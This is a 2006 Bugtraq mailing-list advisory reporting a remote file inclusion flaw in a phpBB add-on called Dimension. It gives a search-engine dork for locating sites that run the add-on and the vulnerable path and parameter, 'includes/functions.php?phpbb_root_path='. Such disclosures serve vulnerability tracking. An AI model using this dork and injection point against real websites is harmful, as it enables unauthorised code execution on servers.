
Date: 18 Nov 2006 11:16:36 -0000
From: bluespy.ok@...il.com
To: bugtraq@...urityfocus.com
Subject: PhpBB Module Dimension Remote File Include

===============================================================================
=Bug was found in the part of phpBB
=
=Dork : "Powered by Dimension"
=
=Expl : includes/functions.php?phpbb_root_path=
=
=Source Code : http://www.xs4all.nl/~hkicken/plusxl20/phpbb2_plusxl_20_272.zip
=
=Found by : Rendy & BlueSpy
=	   IRC.ALLINDO.NET
===============================================================================
